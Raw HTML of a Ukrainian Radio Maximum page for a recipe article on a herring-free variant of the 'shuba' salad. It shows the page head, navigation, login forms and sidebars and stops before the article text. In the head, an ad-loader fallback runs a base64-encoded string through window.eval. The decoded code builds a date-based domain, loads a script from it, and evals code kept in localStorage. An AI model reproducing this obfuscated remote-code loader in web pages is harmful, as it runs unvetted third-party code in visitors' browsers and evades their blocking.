<!doctype html>
<html class="no-js" lang="en">
<head>
<meta charset="utf-8">
<meta http-equiv="x-ua-compatible" content="ie=edge">
<meta content='width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0' name='viewport' />

<link rel="shortcut icon" href="/assets/images/favicons/favicon.ico?v=53" />
<link rel="apple-touch-icon-precomposed" sizes="57x57" href="/assets/images/favicons/apple-icon-57x57.png?v=53" />
<link rel="apple-touch-icon-precomposed" sizes="114x114" href="/assets/images/favicons/apple-icon-114x114.png?v=53" />
<link rel="apple-touch-icon-precomposed" sizes="72x72" href="/assets/images/favicons/apple-icon-72x72.png?v=53" />
<link rel="apple-touch-icon-precomposed" sizes="144x144" href="/assets/images/favicons/apple-icon-144x144.png?v=53" />
<link rel="apple-touch-icon-precomposed" sizes="60x60" href="/assets/images/favicons/apple-icon-60x60.png?v=53" />
<link rel="apple-touch-icon-precomposed" sizes="120x120" href="/assets/images/favicons/apple-icon-120x120.png?v=53" />
<link rel="apple-touch-icon-precomposed" sizes="76x76" href="/assets/images/favicons/apple-icon-76x76.png?v=53" />
<link rel="apple-touch-icon-precomposed" sizes="152x152" href="/assets/images/favicons/apple-icon-152x152.png?v=53" />
<link rel="icon" type="image/png" href="/assets/images/favicons/favicon-196x196.png?v=53" sizes="196x196" />
<link rel="icon" type="image/png" href="/assets/images/favicons/favicon-96x96.png?v=53" sizes="96x96" />
<link rel="icon" type="image/png" href="/assets/images/favicons/favicon-64x64.png?v=53" sizes="64x64" />
<link rel="icon" type="image/png" href="/assets/images/favicons/favicon-48x48.png?v=53" sizes="48x48" />
<link rel="icon" type="image/png" href="/assets/images/favicons/favicon-32x32.png?v=53" sizes="32x32" />
<link rel="icon" type="image/png" href="/assets/images/favicons/favicon-24x24.png?v=53" sizes="24x24" />
<link rel="icon" type="image/png" href="/assets/images/favicons/favicon-16x16.png?v=53" sizes="16x16" />
<link rel="icon" type="image/png" href="/assets/images/favicons/favicon-128x128.png?v=53" sizes="128x128" />
<meta name="msapplication-square70x70logo" content="/assets/images/favicons/mstile-70x70.png?v=53" />
<meta name="msapplication-square150x150logo" content="/assets/images/favicons/mstile-150x150.png?v=53" />
<meta name="msapplication-wide310x150logo" content="/assets/images/favicons/mstile-310x150.png?v=53" />
<meta name="msapplication-square310x310logo" content="/assets/images/favicons/mstile-310x310.png?v=53" />
<meta name="msapplication-TileColor" content="#ffffff" />

<link rel="stylesheet" href="/assets/css/app.min.css?v=53">
<link rel="stylesheet" href="/assets/css/fotorama.css?v=53">
<script></script>
<script>
        var isMobile = function () {
    return /Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent);
};

var lazyLoadScripts = function (func, time) {
    window.addEventListener('load', function () {
        setTimeout(func, time);
    });
}

if (isMobile()) {
                                            } else {
    var node6778 = document.getElementById("MIXADV_6778");
    if( node6778 )
    {
        var script = document.createElement("script");
        script.charset = "utf-8";
        script.src = "https://m.mixadvert.com/show/?id=6778&r="+Math.random();
        node6778.parentNode.appendChild(script);
        script.onerror = function(){
            window.eval( atob("dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDY3NzggLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlNjc3OC5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTY3NzgucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTY3NzguaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjY3NzgiKSkgfSwgNTAwMCk7ICA7fTsg") );
        }
    }
}    </script>
<![if !IE]>
<script src="/assets/js/jquery-3.6.0.min.js?v=53"></script>
<![endif]>
<script src="/assets/js/lib.top.min.js?v=53"></script>
<![if IE]>
<script src="/assets/js/html5shiv.min.js?v=53"></script>
<script src="/assets/js/jquery-1.12.0.min.js?v=53"></script>
<script src="/assets/js/respond.min.js?v=53"></script>
<script src="/assets/js/rem.min.js?v=53"></script>
<![endif]>
<title data-ajax-replace="true">Альтернативний рецепт "шуби": що додати до салату замість оселедця - Радіо Максимум</title>
<meta data-ajax-replace="true" name="title" content="Альтернативний рецепт 'шуби': що додати до салату замість оселедця - Радіо Максимум" />
<meta data-ajax-replace="true" name="description" content="Оселедець під шубою у більшості асоціюється з новорічно-святковим періодом. А оскільки до цього сезону потрібно ще трішки почекати, пропонуємо поекспериментувати та замінити в салаті основний інгредієнт. Запевняємо, вийде також смачно." />
<link data-ajax-replace="true" rel="canonical" href="https://maximum.fm/alternativnij-recept-shubi-shcho-dodati-do-salatu-zamist-oseledcya_n206143" />
<link data-ajax-replace="true" rel="amphtml" href="https://maximum.fm/alternativnij-recept-shubi-shcho-dodati-do-salatu-zamist-oseledcya_n206143/amp">
<meta data-ajax-replace="true" name="author" content='maximum.fm'>
<meta data-ajax-replace="true" name="apple-itunes-app" content="app-id=797596046">
<meta data-ajax-replace="true" name="google-play-app" content="app-id=com.radio24.ua">
<meta data-ajax-replace="true" property="og:type" content="website" />
<meta data-ajax-replace="true" property="og:title" content="Альтернативний рецепт 'шуби': що додати до салату замість оселедця - Радіо Максимум" />
<meta data-ajax-replace="true" property="og:description" content="Оселедець під шубою у більшості асоціюється з новорічно-святковим періодом. А оскільки до цього сезону потрібно ще трішки почекати, пропонуємо поекспериментувати та замінити в салаті основний інгредієнт. Запевняємо, вийде також смачно." />
<meta data-ajax-replace="true" property="og:site_name" content="Радіо Максимум" />
<meta property="og:image" content="https://maximum.fm/uploads/media_news/2022/09/6329b2b83ae31519650270.jpg?w=1200&amp;h=675&amp;il&amp;q=60&amp;output=jpg" />
<meta name="twitter:card" content="summary_large_image" />
<meta name="twitter:site" content="@MAXIMUMFM_ua" />
<meta name="twitter:creator" content="@MAXIMUMFM_ua" />
<meta data-ajax-replace="true" property="og:url" content="https://maximum.fm/alternativnij-recept-shubi-shcho-dodati-do-salatu-zamist-oseledcya_n206143" />
<meta data-ajax-replace="true" property="fb:admins" content="100002197865474" />
<meta data-ajax-replace="true" property="fb:app_id" content="899863283383667" />
<meta data-ajax-replace="true" property="fb:pages" content="100876706667611" />
<script type="application/ld+json">
            {
              "@context": "http://schema.org",
              "@type": "NewsArticle",
              "mainEntityOfPage":{
                "@type": "WebPage",
                "@id": "https://maximum.fm/alternativnij-recept-shubi-shcho-dodati-do-salatu-zamist-oseledcya_n206143"
              },
              "headline": "Альтернативний рецепт 'шуби': що додати до салату замість оселедця",
              "image": {
                "@type": "ImageObject",
                "url": "https://maximum.fm/uploads/media_news/2022/09/6329b2b83ae31519650270.jpg?w=1200&amp;h=675&amp;il&amp;q=60&amp;output=jpg",
                "width": 1200,
                "height": 675
              },
              "datePublished": "2022-09-20 16:52:00",
              "dateModified": "2022-09-21 13:03:29",
                "author": {
                    "@type": "Organization",
                    "name": "maximum.fm"
                },

                "publisher": {
                    "@type": "Organization",
                    "name": "maximum.fm",
                    "email": "music@maximum.fm",
                    "url": "https://maximum.fm/",
                    "logo": {
                        "@type": "ImageObject",
                        "url": "https://maximum.fm/assets/images/favicons/favicon-64x64.png?v=53",
                        "width": 60,
                        "height": 60
                    }
                }
            }

    </script>
<script type="application/ld+json">
        {
         "@context": "http://schema.org",
         "@type": "BreadcrumbList",
         "itemListElement": [{
                    "@type": "ListItem",
                    "position": 1,
                    "name": "Радіо Максимум",
                    "item": "https://maximum.fm/"
                },{
                    "@type": "ListItem",
                    "position": 2,
                    "name": "Популярне",
                    "item": "https://maximum.fm/populyarne_t23834"
                }

                            ,{
                    "@type": "ListItem",
                    "position": 3,
                    "name": "Рецепти",
                    "item": "https://maximum.fm/recepti_t23098"
                }
                        ]
        }
    </script>

<noscript><iframe src="//www.googletagmanager.com/ns.html?id=GTM-W8D5HV"
                  height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript>
<script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
            new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
            j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=
            '//www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
    })(window,document,'script','dataLayer','GTM-W8D5HV');</script>

<link rel="manifest" href="/manifest.json">
<link rel="preconnect" href="https://membrana-cdn.media/" crossorigin>
<link rel="dns-prefetch" href="https://membrana-cdn.media/">
<script async="async" src="https://www.googletagservices.com/tag/js/gpt.js"></script>
<script async="async" src="https://cdn.membrana.media/mfm/ym.js"></script>
<style>
        .nts-video {height: calc((100vw - 30) / 16 * 9); max-height: 360px}
        @media (max-width: 480px) {.nts-video {height: calc(100vw / 16 * 9)}  }
        .nts-video-wrapper {padding-top: 10px; padding-bottom: 20px}
        .nts-video-label {font-size: 12px; font-family: "Helvetica Neue", Arial, sans-serif; line-height: 12px; text-transform: uppercase; color: #999; text-align: center}
        .nts-float-container {z-index: 2!important;}
    </style>
<script>
        lazyLoadScripts( function () {
            var parentEl = document.getElementsByTagName('head');
            var gravitecScript = document.createElement('script');
            gravitecScript.src = "https://cdn.gravitec.net/storage/7e008d1c9fd1a6f52c684c44732eb9f0/client.js"
            gravitecScript.async
            parentEl[0].appendChild(gravitecScript);
        }, 2500);
    </script>
</head>
<body>
<script>
    var dfpAdSlots = [];
</script>
<header class="radio">
<div class="top-section">
<div class="row  red-pla">
<div class="logo-wrapper">
<a href="/" class="header-logo ajaxLink" data-url="/">
</a>
</div>
<div class="all-stations-wrapper stations-wrapper">
<div class="all-stations">
<a id="otherStationsButton" class="open-next-station" aria-expanded="true" style="display: none;">
</a>
<div class="other-stations station-list" id="otherStations" aria-expanded="true">
<div class="next-station-text">Радіостанції</div>
<div class="station-wrapper station-item">
<button class="play-btn play" data-station-name="onair" data-station-id="4" data-station-display-name="ONAIR" data-toggle="otherStations otherStationsButton" data-toggler=".active">
</button>
<a href="/archive" class="ajaxLink" data-url="/archive" title="ONAIR" data-toggle="otherStations otherStationsButton" data-toggler=".active">
<div class="station-name">ONAIR</div>
</a>
</div>
</div>
<div class="station-wrapper station-wrapper-top">
<button class="play-btn play" data-station-name="onair" data-station-id="4" data-station-display-name="ONAIR"></button>
<div class="station-name">
<div>
слухати
<span> ONAIR</span>
</div>
<a href="" id="audio-adv" class="link-to-adv hidden" target="_blank">Перейти на сайт рекламодавця</a>
</div>
</div>
</div>
</div>
<div class="column on-air-wrapper">
<div class="playing-songs-wrapper">
<a data-toggle="openNextSongs openNextSongsButton" data-toggler=".active" id="openNextSongsButton" class="open-next-songs" aria-expanded="true" data-b="efqd6m-b" style="">
</a>
<div class="next-songs-wrapper" id="openNextSongs" data-toggler=".active" aria-expanded="true" data-b="iteq36-b">
<div class="next-songs-text">Далі в ефірі:</div>
<div class="next-songs-list"></div>
</div>
<div class="song-wrapper now-playing-song"></div>
</div>
</div>
<div class="options-wrapper column medium-4 large-4 small-5 " id="profile-wrapper">
<div class="volume show-for-large">
<div class="volume-sign up"></div>
<div class="volume-slider-wrapper ">
<div class="slider volume-progress" data-slider data-initial-start="100" data-start="0">
 <span class="volume-progress-handle" data-slider-handle role="slider" tabindex="1" style="left: 100%;"></span>
<span class="volume-progress-fill" data-slider-fill></span>
<input type="hidden">
</div>
</div>
</div>
<div id="popup" data-user="-1">
<button class="lock flat-button" data-toggle="login-popup" aria-controls="login-popup" id="login-form-show"></button>
<div class="login-popup bounce-in fast" data-submenu id="login-popup" data-toggler data-animate="scale-in-up scale-out-down">
<button class="icon-button close" data-toggle="login-popup" aria-controls="login-popup"></button>
<div class="title">Вхід через соцмережі</div>
<ul class="social-login-buttons">
<a href="/login/facebook" alt="Sign in with Facebook">
<li class="facebook"></li>
</a>
<a href="/login/twitter" alt="Sign in with twitter">
<li class="twitter"></li>
</a>
<a href="/login/google" alt="Sign in with Google">
<li class="google"></li>
</a>
</ul>
<div class="title">Вхід</div>
<form class="login-popup-form" role="form" action="/login_check" method="post">
<label style="display: none" id="form-error-label"></label>
<input class="log-input" type="text" placeholder="Логін" id="username" name="_username" value="" required="required">
<input class="log-input" type="password" placeholder="Пароль" id="password" name="_password">
<div class="other-login-options">
<input type="checkbox" id="remember_me" name="_remember_me" />
<label for="remember_me">
Запам'ятати мене
</label>
<a id="forgot-password">Забули пароль?</a>
</div>
<div class="enter-login-options">
<a data-url="/register" title="Зареєструватись" href="/register" class="icon-button ajaxLink closeBtn">Зареєструватись</a>
<button class="border-button submit-login" id="login-btn-submit" data-toggle="login-popup" aria-controls="login-popup">увійти
</button>
</div>
</form>
</div>
</div>
</div>
</div>
</div>
<div class="webcamera-wrapper">
<div class="row">
<div class="small-12 columns">
<h2>
ВЕБ-КАМЕРА
</h2>
</div>
<div class="medium-8 small-12 columns">
<div class="iframe-wrapper">
<video id="webcamera-player" class="video-js vjs-default-skin tube-css vjs-16-9" preload="auto" poster="https://maximum.fm/assets/images/maximum-new-red-2020-10.svg?v=53" controls playsinline>
</video>
</div>
</div>
<div class="medium-4 small-12 columns other-video-wrapper">
<div class="other-video">
<div class="video-item">
<div class="img-wrap">
<img src="/uploads/media_news/2022/09/6329c0333ee4b837643448.jpg?w=110&amp;h=77&amp;il&amp;q=60&amp;output=jpg" alt="">
</div>
<div class="text">
<h3 class="title">
<a data-url="/ne-mcdonalds-yedinim-yak-prigotuvati-sokovitij-burger-vdoma--prostij-recept-u-video_n206146" target="_self" title="" class=" ajaxLink" href="/ne-mcdonalds-yedinim-yak-prigotuvati-sokovitij-burger-vdoma--prostij-recept-u-video_n206146">
Не McDonald's єдиним: як приготувати соковитий бургер вдома – простий рецепт у відео
<i class="video-icon">відео</i>
</a>
</h3>
<footer>
сьогодні, 18:34
</footer>
</div>
</div>
<div class="video-item">
<div class="img-wrap">
<img src="/uploads/media_news/2022/09/6315e60944efc635251481.jpg?w=110&amp;h=77&amp;il&amp;q=60&amp;output=jpg" alt="">
</div>
<div class="text">
<h3 class="title">
<a data-url="/odin-iz-najdorozhchih-u-sviti-superkariv-rozbili-v-dtp-na-rivnomu-misci-video-momentu-avari_n205955" target="_self" title="" class=" ajaxLink" href="/odin-iz-najdorozhchih-u-sviti-superkariv-rozbili-v-dtp-na-rivnomu-misci-video-momentu-avari_n205955">
Один із найдорожчих у світі суперкарів розбили в ДТП на рівному місці: відео моменту аварі
<i class="video-icon">відео</i>
</a>
</h3>
<footer>
сьогодні, 17:27
</footer>
</div>
</div>
<div class="video-item">
<div class="img-wrap">
<img src="/uploads/media_news/2022/09/6329a4749fec0057850093.png?w=110&amp;h=77&amp;il&amp;q=60&amp;output=jpg" alt="">
</div>
<div class="text">
<h3 class="title">
<a data-url="/naomi-kempbell-postala-u-novij-reklami-hm-atmosferne-video_n206140" target="_self" title="" class=" ajaxLink" href="/naomi-kempbell-postala-u-novij-reklami-hm-atmosferne-video_n206140">
Наомі Кемпбелл постала у новій рекламі H&M: атмосферне відео
<i class="video-icon">відео</i>
</a>
</h3>
<footer>
сьогодні, 15:23
</footer>
</div>
</div>
<div class="video-item">
<div class="img-wrap">
<img src="/uploads/media_news/2022/09/6318cb5a1d837033032049.png?w=110&amp;h=77&amp;il&amp;q=60&amp;output=jpg" alt="">
</div>
<div class="text">
<h3 class="title">
<a data-url="/cikavi-seriali-veresnya-2022-top-9-novinok-yaki-ne-mozhna-propustiti_n205883" target="_self" title="" class=" ajaxLink" href="/cikavi-seriali-veresnya-2022-top-9-novinok-yaki-ne-mozhna-propustiti_n205883">
Цікаві серіали вересня 2022: ТОП 9 новинок, які не можна пропустити
<i class="video-icon">відео</i>
</a>
</h3>
<footer>
вчора, 13:21
 </footer>
</div>
</div>
</div>
<button class="load-more load-more-news">
arrow
</button>
</div>
</div>
</div>
<div class="bottom-section">
<div class="row  menu-wrapper">
<div class="small-12 columns">
<div class="row">
<div class="small-12 columns">
<div class="mobile-header" style="">
<div class="hamburger hamburger--collapse">
<span class="hamburger-box">
<span class="hamburger-inner"></span>
</span>
</div>
<a href="/" class="logo ajaxLink" data-url="/">
<img src="/assets/images/logo-maximum-2020-10.svg?v=53" style="width: 100px; height: 54px" alt="Mobile logo">
</a>
<div id="popup" data-user="-1">
<button class="lock flat-button" data-toggle="login-popup" aria-controls="login-popup" id="login-form-show"></button>
<div class="login-popup bounce-in fast" data-submenu id="login-popup" data-toggler data-animate="scale-in-up scale-out-down">
<button class="icon-button close" data-toggle="login-popup" aria-controls="login-popup"></button>
<div class="title">Вхід через соцмережі</div>
<ul class="social-login-buttons">
<a href="/login/facebook" alt="Sign in with Facebook">
<li class="facebook"></li>
</a>
<a href="/login/twitter" alt="Sign in with twitter">
<li class="twitter"></li>
</a>
<a href="/login/google" alt="Sign in with Google">
<li class="google"></li>
</a>
</ul>
<div class="title">Вхід</div>
<form class="login-popup-form" role="form" action="/login_check" method="post">
<label style="display: none" id="form-error-label"></label>
<input class="log-input" type="text" placeholder="Логін" id="username" name="_username" value="" required="required">
<input class="log-input" type="password" placeholder="Пароль" id="password" name="_password">
<div class="other-login-options">
<input type="checkbox" id="remember_me" name="_remember_me" />
<label for="remember_me">
Запам'ятати мене
</label>
<a id="forgot-password">Забули пароль?</a>
</div>
<div class="enter-login-options">
<a data-url="/register" title="Зареєструватись" href="/register" class="icon-button ajaxLink closeBtn">Зареєструватись</a>
<button class="border-button submit-login" id="login-btn-submit" data-toggle="login-popup" aria-controls="login-popup">увійти
</button>
</div>
</form>
</div>
</div>
</div>
<div class="menu">
<div class="tagName-novini menu-item ">
<a href="/novini_t2" class="menu-link ajaxLink" data-url="/novini_t2">
Новини
</a>
<div class="sub-menu-wrapper">
<div class="sub-menu">
<a href="/ukrayina_t22822" class="tagName-ukrayina sub-menu-item ajaxLink" data-url="/ukrayina_t22822">
Україна
</a>
<a href="/svit_t15" class="tagName-svit sub-menu-item ajaxLink" data-url="/svit_t15">
Світ
</a>
<a href="/sport_t22784" class="tagName-sport sub-menu-item ajaxLink" data-url="/sport_t22784">
Спорт
</a>
<a href="/kultura_t10" class="tagName-kultura sub-menu-item ajaxLink" data-url="/kultura_t10">
Культура
</a>
<a href="/foto_t6" class="tagName-foto sub-menu-item ajaxLink" data-url="/foto_t6">
Фото
</a>
<a href="/video_t7" class="tagName-video sub-menu-item ajaxLink" data-url="/video_t7">
Відео
</a>
</div>
</div>
</div>
<div class="tagName-shou-biz menu-item ">
<a href="/shou-biz_t22786" class="menu-link ajaxLink" data-url="/shou-biz_t22786">
Шоу-біз
</a>
<div class="sub-menu-wrapper">
<div class="sub-menu">
<a href="/zirki_t23798" class="tagName-zirki sub-menu-item ajaxLink" data-url="/zirki_t23798">
Зірки
</a>
<a href="/moda_t22837" class="tagName-moda sub-menu-item ajaxLink" data-url="/moda_t22837">
Мода
</a>
<a href="/kino_t22736" class="tagName-kino sub-menu-item ajaxLink" data-url="/kino_t22736">
Кіно
</a>
<a href="/seriali_t23561" class="tagName-seriali sub-menu-item ajaxLink" data-url="/seriali_t23561">
Серіали
</a>
<a href="/televizijni-shou_t23799" class="tagName-televizijni-shou sub-menu-item ajaxLink" data-url="/televizijni-shou_t23799">
ТБ-шоу
</a>
<a href="/muzichni-novinki_t23831" class="tagName-muzichni-novinki sub-menu-item ajaxLink" data-url="/muzichni-novinki_t23831">
 Музичні новинки
</a>
</div>
</div>
</div>
<div class="tagName-lajfstajl menu-item ">
<a href="/lajfstajl_t23832" class="menu-link ajaxLink" data-url="/lajfstajl_t23832">
Лайфстайл
</a>
<div class="sub-menu-wrapper">
<div class="sub-menu">
<a href="/zdorovya_t22746" class="tagName-zdorovya sub-menu-item ajaxLink" data-url="/zdorovya_t22746">
Здоров&#039;я
</a>
<a href="/yizha_t23025" class="tagName-yizha sub-menu-item ajaxLink" data-url="/yizha_t23025">
Їжа
</a>
<a href="/kurjozi_t22751" class="tagName-kurjozi sub-menu-item ajaxLink" data-url="/kurjozi_t22751">
Курйози
</a>
<a href="/podorozhi_t22743" class="tagName-podorozhi sub-menu-item ajaxLink" data-url="/podorozhi_t22743">
Подорожі
</a>
<a href="/goroskop_t23796" class="tagName-goroskop sub-menu-item ajaxLink" data-url="/goroskop_t23796">
Гороскоп
</a>
<a href="/testi_t22841" class="tagName-testi sub-menu-item ajaxLink" data-url="/testi_t22841">
Тести
</a>
</div>
</div>
</div>
<div class="tagName-tehnologiyi menu-item ">
<a href="/tehnologiyi_t18" class="menu-link ajaxLink" data-url="/tehnologiyi_t18">
Техно
</a>
<div class="sub-menu-wrapper">
<div class="sub-menu">
<a href="/gadzheti_t22745" class="tagName-gadzheti sub-menu-item ajaxLink" data-url="/gadzheti_t22745">
Гаджети
</a>
<a href="/avto_t22770" class="tagName-avto sub-menu-item ajaxLink" data-url="/avto_t22770">
Авто
</a>
<a href="/pobutova-tehnika_t23833" class="tagName-pobutova-tehnika sub-menu-item ajaxLink" data-url="/pobutova-tehnika_t23833">
Побутова техніка
</a>
<a href="/internet_t22835" class="tagName-internet sub-menu-item ajaxLink" data-url="/internet_t22835">
Інтернет
</a>
<a href="/igri_t23443" class="tagName-igri sub-menu-item ajaxLink" data-url="/igri_t23443">
Ігри
</a>
<a href="/kosmos_t22839" class="tagName-kosmos sub-menu-item ajaxLink" data-url="/kosmos_t22839">
Космос
</a>
</div>
</div>
</div>
<div class="tagName-populyarne menu-item ">
<a href="/populyarne_t23834" class="menu-link ajaxLink" data-url="/populyarne_t23834">
Популярне
</a>
<div class="sub-menu-wrapper">
<div class="sub-menu">
<a href="/nostalgiya_t23821" class="tagName-nostalgiya sub-menu-item ajaxLink" data-url="/nostalgiya_t23821">
Ностальгія
</a>
<a href="/cikavinki_t23802" class="tagName-cikavinki sub-menu-item ajaxLink" data-url="/cikavinki_t23802">
Цікаві новини
</a>
<a href="/ukrayinska-muzika_t23685" class="tagName-ukrayinska-muzika sub-menu-item ajaxLink" data-url="/ukrayinska-muzika_t23685">
Українська музика
</a>
<a href="/privitannya_t23757" class="tagName-privitannya sub-menu-item ajaxLink" data-url="/privitannya_t23757">
Привітання
</a>
<a href="/recepti_t23098" class="tagName-recepti sub-menu-item ajaxLink" data-url="/recepti_t23098">
Рецепти
</a>
<a href="https://maximum.fm/privitannya-z-dnem-narodzhennya-najkrashchi-vitannya-ukrayinskoyu-movoyu_n140167" class="tagName- sub-menu-item ajaxLink" data-url="https://maximum.fm/privitannya-z-dnem-narodzhennya-najkrashchi-vitannya-ukrayinskoyu-movoyu_n140167">
З днем народження
</a>
</div>
</div>
</div>
<div class="tagName-pro-radio menu-item ">
<a href="/pro-radio_t23861" class="menu-link ajaxLink" data-url="/pro-radio_t23861">
Про радіо
</a>
<div class="sub-menu-wrapper">
<div class="sub-menu">
<a href="/staff" class="tagName- sub-menu-item ajaxLink" data-url="/staff">
Ведучі
</a>
 <a href="/radiocovermap" class="tagName- sub-menu-item ajaxLink" data-url="/radiocovermap">
Карта покриття
</a>
<a href="/contacts" class="tagName- sub-menu-item ajaxLink" data-url="/contacts">
Контакти
</a>
<a href="/archive" class="tagName- sub-menu-item ajaxLink" data-url="/archive">
Що звучало в ефірі
</a>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</header>
<div class="main-content">
<div class="reveal" style="position: relative;" id="register-start" data-reveal>
<span class="replace-h3">Вітаємо на сайті Радіо Максимум!</span>
<p class='lead'>На вказану електронну адресу було надіслано повідомлення для підтвердження реєстрації</p>
<button class="close-button" data-close aria-label="Close reveal" type="button" onClick="window.location.reload()">
<span aria-hidden="true">&times;</span>
</button>
</div>
<div class="reveal" style="position: relative;" id="resetting-start" data-reveal>
<form action="/resetting/send-email" method="POST" class="fos_user_resetting_request" id="fos_user_resetting_request" novalidate>
<span class="replace-h4">Форма для відновлення паролю</span>
<div>
<input type="text" class="base-input" id="username_email" name="username" required="required" placeholder="Введіть логін або електронну пошту!" autofocus />
<p id="error-message" style="display: none; color: red;">Такий логін або адреса електронної пошти не зареєстровані в системі!</p>
</div>
<div class="large-4 float-right ">
<button type="submit" class="border-button " value="Надіслати">Надіслати</button>
</div>
</form>
<span class="replace-h5" id="show-message-from-resetting"></span>
<button class="close-button" data-close aria-label="Close reveal" type="button">
<span aria-hidden="true">&times;</span>
</button>
</div>
<div class="reveal" style="position: relative;" id="user-update" data-reveal>
<span class="replace-h4" style="text-align: center">Вітаємо, Ваші дані успішно оновлено!</span>
<button class="close-button" data-close aria-label="Close reveal" type="button" onClick="window.location.reload()">
<span aria-hidden="true">&times;</span>
</button>
</div>
<script>
        if (typeof window.widget !== 'undefined') {
            window.widget.changeParam('newsId', '206143');
        }
    </script>
<div class="white">
<div id="loadNewsContainerData" data-news-id="206143" data-limit="1" data-offset="0" data-url="/get-scroll-news">
</div>
<div class="content-wrapper  row" data-title="Альтернативний рецепт " шуби": що додати до салату замість оселедця" data-image="https://maximum.fm/uploads/media_news/2022/09/6329b2b83ae31519650270.jpg?w=424&amp;h=239&amp;il&amp;q=60&amp;output=jpg" data-author="Назар Сорока" data-path="/alternativnij-recept-shubi-shcho-dodati-do-salatu-zamist-oseledcya_n206143" data-tags="Популярне, Рецепти, Їжа">
<div class="columns small-12 medium-12 large-8">
<div>
<div id="ontheioViewTacking" data-tags="Популярне,Рецепти,Їжа,Фото,Новини" class="news-content-wrapper" data-title="Альтернативний рецепт " шуби": що додати до салату замість оселедця - Радіо Максимум" data-path="/alternativnij-recept-shubi-shcho-dodati-do-salatu-zamist-oseledcya_n206143" data-id="206143">
<div class="top-tags-wrapper">
<a href="/vijna_t22973" class="top-tag">
<i class="flash"></i>війна</a>
<a href="/sprostovuyemo-fejki_t23931" class="top-tag">
<i class="flash"></i>Спростовуємо фейки</a>
</div>
<div class="news-title"><h1>Альтернативний рецепт "шуби": що додати до салату замість оселедця</h1>
</div>
<ul class="statistic">
<li class="date">
<time datetime="2022-09-20 16:52">
Вчора, 16:52
</time>
</li>
<li class="watchers">34</li>
</ul>
<div class="news-photo-container">
<div class="news-photo">
<img src="/uploads/media_news/2022/09/6329b2b83ae31519650270.jpg?w=1200&amp;h=675&amp;il&amp;q=80&amp;output=jpg" title="Альтернативний рецепт &quot;шуби&quot;: що додати до салату замість оселедця - 1" alt="Альтернативний рецепт &quot;шуби&quot;: що додати до салату замість оселедця - фото 1">
<ul class="news-sharing ">
<li class="facebook-count counter">
<a id="facebook" data-news-url="https://maximum.fm/alternativnij-recept-shubi-shcho-dodati-do-salatu-zamist-oseledcya_n206143" href="javascript: void(0);" class="facebook inPage soc_counter_fb_206143">
</a>
</li>
<li class="twitter-count counter">
<a id="twitter" data-news-url="https://maximum.fm/alternativnij-recept-shubi-shcho-dodati-do-salatu-zamist-oseledcya_n206143" data-news-name="Альтернативний рецепт &quot;шуби&quot;: що додати до салату замість оселедця" href="javascript: void(0);" class="twitter inPage soc_counter_tw_206143">
</a>
</li>
</ul>
</div>
<div class="news-photo-sideblock show-for-medium">
<ul class="popular-news">
<li class="title">Популярне</li>
<li><a class="ajaxLink" data-url="/den-angela-mariyi-znachennya-imeni-ta-harakter-jogo-vlasnic_n170487" title="" href="/den-angela-mariyi-znachennya-imeni-ta-harakter-jogo-vlasnic_n170487">День ангела Марії 2022: значення імені та характер його власниць</a></li>
<li><a class="ajaxLink" data-url="/top-5-najkrasivishih-dorig-svitu-avtomobilni-marshruti-vid-yakih-perehoplyuye-podih_n194289" title="" href="/top-5-najkrasivishih-dorig-svitu-avtomobilni-marshruti-vid-yakih-perehoplyuye-podih_n194289">ТОП 5 найкрасивіших доріг світу: автомобільні маршрути, від яких перехоплює подих</a></li>
</ul>
</div>
</div>
<div class="news-content news-content-block">
